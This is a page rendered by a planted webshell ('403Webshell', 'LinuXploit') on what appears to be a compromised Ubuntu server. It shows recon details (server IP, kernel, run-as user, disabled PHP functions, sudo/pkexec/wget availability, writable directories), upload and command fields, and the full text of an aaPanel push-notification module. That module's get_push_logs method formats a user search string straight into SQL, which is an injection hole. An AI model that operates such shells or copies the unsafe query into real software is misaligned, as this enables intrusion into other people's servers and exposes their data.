403Webshell
Server IP : 104.21.38.3  /  Your IP : 172.70.143.4
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/panel/class_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/panel/class_v2/panel_push_v2.py
#coding: utf-8
# +-------------------------------------------------------------------
# | aaPanel
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 aaPanel(www.aapanel.com) All rights reserved.
# +-------------------------------------------------------------------
# | Author: 沐落 <[email protected]>
# | Author: lx
# | 消息推送管理
# | 对外方法 get_modules_list、install_module、uninstall_module、get_module_template、set_push_config、get_push_config、del_push_config
# +-------------------------------------------------------------------

import os, sys

panelPath = "/www/server/panel"
os.chdir(panelPath)
sys.path.insert(0,panelPath + "/class/")
import public,re,json,time
try:
    from BTPanel import session
except :
    pass
class panelPush:

    __conf_path =  "{}/class/push/push.json".format(panelPath)
    def __init__(self):
        spath = '{}/class/push'.format(panelPath)
        if not os.path.exists(spath): os.makedirs(spath)

    """
    @获取推送模块列表
    """
    def get_modules_list(self,get):
        cpath = '{}/class/push/push_list.json'.format(panelPath)
        try:
            spath = os.path.dirname(cpath)
            if not os.path.exists(spath): os.makedirs(spath)

            if 'force' in get or not os.path.exists(cpath):
                if not 'download_url' in session: session['download_url'] = public.get_url()
                public.downloadFile('{}/linux/panel/push/push_list.json'.format(session['download_url']),cpath)
        except : pass

        if not os.path.exists(cpath):
            return {}

        data = {}
        push_list = self._get_conf()
        module_list = public.get_modules('class/push')

        configs = json.loads(public.readFile(cpath))
        for p_info in configs:
            p_info['data'] = {}
            p_info['setup'] = False
            p_info['info'] = False
            key = p_info['name']
            try:
                if hasattr(module_list, key):
                    p_info['setup'] = True
                    # if key in module_list:
                    #     print(dir(module_list))
                    #     print(dir(module_list[key]))
                    #     print(dir(getattr(module_list[key], key)))
                    push_module = getattr(module_list[key], key)()
                    p_info['info'] = push_module.get_version_info(None);
                    #格式化消息通道
                    if key in push_list:
                        p_info['data'] = self.__get_push_list(push_list[key])
                    #格式化返回执行周期
                    if hasattr(push_module,'get_push_cycle'):
                        p_info['data'] = push_module.get_push_cycle(p_info['data'])
            except :
                return public.get_error_object(None)
            data[key] = p_info
        return data

    """
    安装/更新消息通道模块
    @name 需要安装的模块名称
    """
    def install_module(self,get):
        module_name = get.name
        down_url = public.get_url()

        local_path = '{}/class/push'.format(panelPath)
        if not os.path.exists(local_path): os.makedirs(local_path)

        sfile = '{}/{}.py'.format(local_path,module_name)
        public.downloadFile('{}/linux/panel/push/{}.py'.format(down_url,module_name),sfile)
        if not os.path.exists(sfile): return public.returnMsg(False, '[{}] Module installation failed'.format(module_name))
        if os.path.getsize(sfile) < 1024: return public.returnMsg(False, '[{}] Module installation failed'.format(module_name))

        sfile = '{}/class/push/{}.html'.format(panelPath,module_name)
        public.downloadFile('{}/linux/panel/push/{}.html'.format(down_url,module_name),sfile)

        return public.returnMsg(True, '[{}] Module installed successfully.'.format(module_name))

    """
    卸载消息通道模块
    @name 需要卸载的模块名称
    """
    def uninstall_module(self,get):
        module_name = get.name
        sfile = '{}/class/push/{}.py'.format(panelPath,module_name)
        if os.path.exists(sfile): os.remove(sfile)

        return public.returnMsg(True, '[{}] Module uninstalled successfully'.format(module_name))


    """
    @获取模块执行日志
    """
    def get_module_logs(self,get):
        module_name = get.name
        id = get.id
        return []

    """
    获取模块模板
    """
    def get_module_template(self,get):
        sfile = '{}/class/push/{}.html'.format(panelPath,get.module_name)

        if not os.path.exists(sfile):
            return public.returnMsg(False, 'template file does not exist!')

        shtml = public.readFile(sfile)
        return public.returnMsg(True, shtml)


    """
    @获取模块推送参数,如:panel_push ssl到期,服务停止
    """
    def get_module_config(self,get):
        module = get.name
        p_list = public.get_modules('class/push')
        push_module = getattr(p_list[module], module)()

        if not module in p_list:
            return public.returnMsg(False, 'The specified module [{}] is not installed!'.format(module))

        if not hasattr(push_module,'get_module_config'):
            return public.returnMsg(False, 'No get_module_config method exists for the specified module [{}].'.format(module))
        return push_module.get_module_config(get)



    """
    @获取模块配置项
    @优先调用模块内的get_push_config
    """
    def get_push_config(self,get):
        module = get.name
        id = get.id
        p_list = public.get_modules('class/push')
        if not module in p_list:
            return public.returnMsg(False, 'The specified module [{}] is not installed.'.format(module))

        result = None
        push_module = getattr(p_list[module], module)()
        if not hasattr(push_module,'get_push_config'):
            push_list = self._get_conf()

            res_data = public.returnMsg(False, 'The specified configuration was not found!')
            res_data['code'] = 100
            if not module in push_list:
                return res_data
            if not id in push_list[module]:
                return res_data

            result = push_list[module][id]
        else:
            result = push_module.get_push_config(get)
        return self.get_push_user(result)

    def get_push_user(self,result):

        #获取发送给谁
        if not 'to_user' in result:
            result['to_user'] = {}
            if 'module' in result:
                for s_module in result['module'].split(','):
                    result['to_user'][s_module] = 'default'
            else:
                return False

        info = {}
        for s_module in result['module'].split(','):
            msg_obj = public.init_msg(s_module)
            if not msg_obj: continue

            info[s_module] = {}
            data = msg_obj.get_config(None)

            if 'list' in data:
                for key in result['to_user'][s_module].split(','):
                    if not key in data['list']:
                        continue
                    info[s_module][key] = data['list'][key]
        result['user_info'] = info
        return result

    """
    @设置推送配置
    @优先调用模块内的set_push_config
    """
    def set_push_config(self,get):
        module = get.name
        id = get.id
        p_list = public.get_modules('class/push')

        if not module in p_list:
            return public.returnMsg(False, 'The specified module [{}] is not installed.'.format(module))

        pdata = json.loads(get.data)
        if not 'module' in pdata or not pdata['module']:
            return public.returnMsg(False, 'The specified alarm method is not set, please select again.')
        if module == "load_balance_push":
            pdata = self.__get_args(pdata,'cycle', "500|502|503|504")
        else:
            pdata = self.__get_args(pdata, 'cycle', 1)
        pdata = self.__get_args(pdata,'count',1)
        pdata = self.__get_args(pdata,'interval',600)
        pdata = self.__get_args(pdata,'key','')
        pdata = self.__get_args(pdata,'push_count',0)

        nData = {}
        for skey in ['key','type','cycle','count','interval','module','title','project','status','index','push_count']:
            if skey in pdata:
                nData[skey] = pdata[skey]

        public.set_module_logs('set_push_config',nData['type'])
        class_obj = getattr(p_list[module], module)()
        if hasattr(class_obj,'set_push_config'):
            get['data'] = json.dumps(nData)
            result = class_obj.set_push_config(get)
            if 'status' in result: return result

            data = result
        else:
            data = self._get_conf()
            if not module in data:data[module] = {}
            data[module][id] = nData


        public.writeFile(self.__conf_path,json.dumps(data))
        return public.returnMsg(True, 'Saved successfully')

    """
    @设置推送状态
    """
    def set_push_status(self,get):
        id = get.id
        module = get.name

        data = self._get_conf()
        if not module in data: return public.returnMsg(True, 'module name does not exist!')
        if not id in data[module]: return public.returnMsg(True, 'The specified push task does not exist!')

        status = int(get.status)
        if status:
            data[module][id]['status'] = True
        else:
            data[module][id]['status'] =  False
        public.writeFile(self.__conf_path,json.dumps(data))
        return public.returnMsg(True, 'Successful operation.')
    """
    @删除指定配置
    """
    def del_push_config(self,get):
        id = get.id
        module = get.name

        p_list = public.get_modules('class/push')
        if not module in p_list:
            return public.returnMsg(False, 'The specified module {} is not installed.'.format(module))
        push_module = getattr(p_list[module], module)()
        if not hasattr(push_module,'del_push_config'):
            data = self._get_conf()
            del data[module][id]
            public.writeFile(self.__conf_path,json.dumps(data))
            return public.returnMsg(True, 'successfully deleted.')

        return push_module.del_push_config(get)

    """
    获取消息通道配置列表
    """
    def get_push_msg_list(self,get):
        data = {}
        msgs = self.__get_msg_list()
        from panelMessage import panelMessage
        pm = panelMessage()
        for x in msgs:
            x['setup'] = False
            key = x['name']
            try:
                obj =  pm.init_msg_module(key)
                if obj:
                    x['setup'] = True
                    if key == 'sms':x['title'] = '{}<a title="Please make sure there are enough SMS messages, otherwise you will not be able to receive notifications." href="javascript:;" class="bt-ico-ask">?</a>'.format(x['title'])
            except :
                pass
            data[key] = x
        return data

    """
    @ 获取消息推送配置
    """
    def _get_conf(self):
        data = {}
        try:
            if os.path.exists(self.__conf_path):
                data = json.loads(public.readFile(self.__conf_path))
                self.update_config(data)
        except:pass
        return data

    """
    @ 获取插件版本信息
    """
    def get_version_info(self):
        """
        获取版本信息
        """
        data = {}
        data['ps'] = ''
        data['version'] = '1.0'
        data['date'] = '2020-07-14'
        data['author'] = '宝塔'
        data['help'] = 'http://www.aapanel.com'
        return data

    """
    @格式化推送对象
    """
    def format_push_data(self,push = ['dingding','weixin','feishu'], project = '', type = ''):
        item = {
            'title':'',
            'project':project,
            'type':type,
            'cycle':1,
            'count':1,
            'keys':[],
            'helps':[],
            'push':push
        }
        return item



    def push_message_immediately(self, channel_data):
        """推送消息到指定的消息通道,即时

        Args:
            channel_data(dict):
                key: msg_channel, 消息通道名称,多个用逗号相连
                value: msg obj, 每种消息通道的消息内容格式,可能包含标题

        Returns:
            {
                status: True/False,
                msg: {
                    "email": {"status": msg},
                    ...
                }
            }
        """
        if type(channel_data) != dict:
            return public.returnMsg(False, "The parameter is wrong")

        from panelMessage import panelMessage
        pm = panelMessage()
        channel_res = {}
        res = {
            "status": False,
            "msg": channel_res
        }

        for module, msg in channel_data.items():
            modules = []
            if module.find(",") != -1:
                modules = module.split(",")
            else:
                modules.append(module)
            for m_module in modules:
                msg_obj = pm.init_msg_module(m_module)
                if not msg_obj:continue
                ret = msg_obj.push_data(msg)
                if ret and "status" in ret and ret['status']:
                    res["status"] = True
                    channel_res[m_module] = ret
                else:
                    msg = "Message push failed."
                    if "msg" in ret:
                        msg = ret["msg"]
                    channel_res[m_module] = public.returnMsg(False, msg)
        return res

    """
    @格式为消息通道格式
    """
    def format_msg_data(self):
        data = {
            'title':'',
            'to_email':'',
            'sms_type':'',
            'sms_argv':{},
            'msg':''
        }
        return data

    def __get_msg_list(self):
        """
        获取消息通道列表
        """
        data = []
        cpath = '{}/data/msg.json'.format(panelPath)
        if not os.path.exists(cpath):
            return data
        try:
            conf = public.readFile(cpath)
            data = json.loads(conf)
        except :
            try:
                time.sleep(0.5)
                conf = public.readFile(cpath)
                data = json.loads(conf)
            except:pass

        return data

    def __get_args(self,data,key,val = ''):
        """
        @获取默认参数
        """
        if not key in data: data[key] = val
        if type(data[key]) != type(val):
            data[key] = val
        return data


    def __get_push_list(self,data):
        """
        @格式化列表数据
        """
        m_data = {}
        result = {}
        for x in self.__get_msg_list(): m_data[x['name']] = x

        for skey in data:
            result[skey] = data[skey]

            m_list = []
            for x in data[skey]['module'].split(','):
                if x in m_data: m_list.append(m_data[x]['title'])
            result[skey]['m_title'] = '、'.join(m_list)

            m_cycle =[]
            if data[skey]['cycle'] > 1:
                m_cycle.append('every {} seconds'.format(data[skey]['cycle']))
            m_cycle.append('{} times, with an interval of {} seconds'.format(data[skey]['count'],data[skey]['interval']))
            result[skey]['m_cycle'] = ''.join(m_cycle)

            # 兼容旧版本没有返回project项,导致前端无法编辑问题
            if "project" not in result[skey] and "type" in result[skey]:
                if result[skey]["type"]  == "services":
                    services = ['nginx','apache',"pure-ftpd",'mysql','php-fpm','memcached','redis']
                    _title = result[skey]['title']
                    for s in services:
                        if _title.find(s)!=-1:
                            result[skey]["project"] = s
                else:
                    result[skey]["project"] = result[skey]["type"]
            if "project" in result[skey]:
                if result[skey]["project"] == "FTP server":
                    result[skey]["project"] ="pure-ftpd"
        return result


    #************************************************推送
    """
    @推送data/push目录的所有文件
    """
    def push_messages_from_file(self):

        path = "{}/data/push".format(panelPath)
        if not os.path.exists(path): os.makedirs(path)

        from panelMessage import panelMessage
        pm = panelMessage()

        for x in os.listdir(path):
            try:
                spath = '{}/{}'.format(path,x)
                if os.path.isdir(spath): continue
                data = json.loads(public.readFile(spath))

                msg_obj = pm.init_msg_module(data['module'])
                if not msg_obj:continue

                ret = msg_obj.push_data(data)
                if ret['status']: pass

                os.remove(spath)
            except :
                print(public.get_error_info())

    """
    @消息推送线程
    """
    def start(self):

        total = 0
        interval = 5

        tips = '{}/data/push/tips'.format(public.get_panel_path())
        if not os.path.exists(tips): os.makedirs(tips)

        try:
            if True:
                # 推送文件
                self.push_messages_from_file()

                # 调用推送子模块
                data = {}
                is_write = False
                path = "{}/class/push/push.json".format(panelPath)

                if os.path.exists(path):
                    data = public.readFile(path)
                    data = json.loads(data)

                p = public.get_modules('class/push')
                for skey in data:
                    if len(data[skey]) <= 0: continue
                    if skey in ['panelLogin_push','panel_login']: continue #面板登录主动触发

                    total = None
                    obj = getattr(p[skey], skey)()

                    for x in data[skey]:
                        try:

                            item = data[skey][x]
                            item['id'] = x
                            if not item['status']: continue
                            if not item['module']: continue
                            if not 'index' in item: item['index'] = 0

                            if time.time() - item['index'] < item['interval']:
                                print('{} Interval not reached, skip.'.format(item['title']))
                                continue

                            #验证推送次数
                            push_record = {}
                            tips_path = '{}/{}'.format(tips,x)
                            if 'push_count' in item and item['push_count'] > 0:
                                item['tips_list'] = []
                                try:
                                    push_record = json.loads(public.readFile(tips_path))
                                except:pass
                                for k in push_record:
                                    if push_record[k] < item['push_count']:
                                        continue
                                    item['tips_list'].append(k)

                            #获取推送数据
                            if not total: total = obj.get_total()
                            rdata = obj.get_push_data(item,total)
                            if not rdata:
                                continue
                            push_status = False
                            for m_module in item['module'].split(','):
                                if not m_module in rdata:
                                    continue

                                msg_obj = public.init_msg(m_module)
                                if not msg_obj:continue

                                if 'to_user' in item and m_module in item['to_user']:
                                    rdata[m_module]['to_user'] = item['to_user'][m_module]

                                ret = msg_obj.push_data(rdata[m_module])
                                data[skey][x]['index'] = rdata['index']
                                is_write = True
                                push_status = True

                            #获取是否推送成功.
                            if push_status:
                                if 'push_keys' in rdata:
                                    for k in rdata['push_keys']:
                                        if not k in push_record: push_record[k] = 0
                                        push_record[k] += 1
                                    public.writeFile(tips_path,json.dumps(push_record))
                        except :
                            print(public.get_error_info())

                if is_write:
                    public.writeFile(path,json.dumps(data))
                #time.sleep(interval)
        except :

            print(public.get_error_info())


    def __get_login_panel_info(self):
        """
        @name 获取面板登录列表
        @auther cjxin
        @date 2022-09-29
        """
        import config
        c_obj = config.config()
        send_type = c_obj.get_login_send(None)['msg']
        if not send_type:
            return False
        return {"type":"panel_login","module":send_type,"interval":600,"status":True,"title":"Panel Login Alert","cycle":1,"count":1,"key":"","module_type":'site_push'}


    def __get_ssh_login_info(self):
        """
        @name 获取SSH登录列表
        @auther cjxin
        @date 2022-09-29
        """
        import ssh_security
        c_obj = ssh_security.ssh_security()
        send_type = c_obj.get_login_send(None)['msg']
        if not send_type or send_type in ['error']:
            return False

        return {"type":"ssh_login","module":send_type,"interval":600,"status":True,"title":"SSH login warning","cycle":1,"count":1,"key":"","module_type":'site_push'}



    def get_push_list(self,get):
        """
        @获取所有推送列表
        """
        conf = self._get_conf()
        for key in conf.keys():
            for x in conf[key]:
                data = conf[key][x]
                data['module_type'] = key

                conf[key][x] = self.get_push_user(data)

        if not 'site_push' in conf: conf['site_push'] = {}

        data = conf['site_push']
        for skey in ['panel_login','ssh_login']:
            info = None
            if skey in data:
                del data[skey]
            if skey in ['panel_login']:
                info = self.__get_login_panel_info()
            elif skey in ['ssh_login']:
                info = self.__get_ssh_login_info()

            if info:
                data[skey] = info
        conf['site_push'] = data
        return conf

    def get_push_logs(self,get):
        """
        @name 获取推送日志
        """

        p = 1
        limit = 15
        if 'p' in get: p = get.p
        if 'limit' in get: limit = get.limit

        where = "type = 'Alarm notification'"
        sql = public.M('logs')

        if hasattr(get, 'search'):
            where = " and logs like '%{search}%' ".format(search=get.search)

        count = sql.where(where,()).count()
        data = public.get_page(count,int(p),int(limit))
        pattern = r"href='(?:/v2)?/push.*?\?p=(\d+)'"
        # 使用re.sub进行替换
        data['page'] = re.sub(pattern, r"href='\1'", data['page'])

        data['data'] = public.M('logs').where(where,()).limit('{},{}'.format(data['shift'], data['row'])).order('id desc').select()

        return public.return_message(0, 0,  data)

    # 兼容旧版本的告警
    def update_config(self, config):
        if "site_push" not in config:
            config["site_push"] = {}
        if "panel_push" in config:
            for k, v in config["panel_push"].items():
                if v["type"] != "endtime":
                    config["site_push"][k] = v
                if "push_count" not in v:
                    v["push_count"] = 1 if v["type"] == "ssl" else 0
            del config["panel_push"]
            public.writeFile(self.__conf_path, json.dumps(config))


if __name__ == '__main__':
    panelPush().start()

Youez - 2016 - github.com/yon3zu
LinuXploit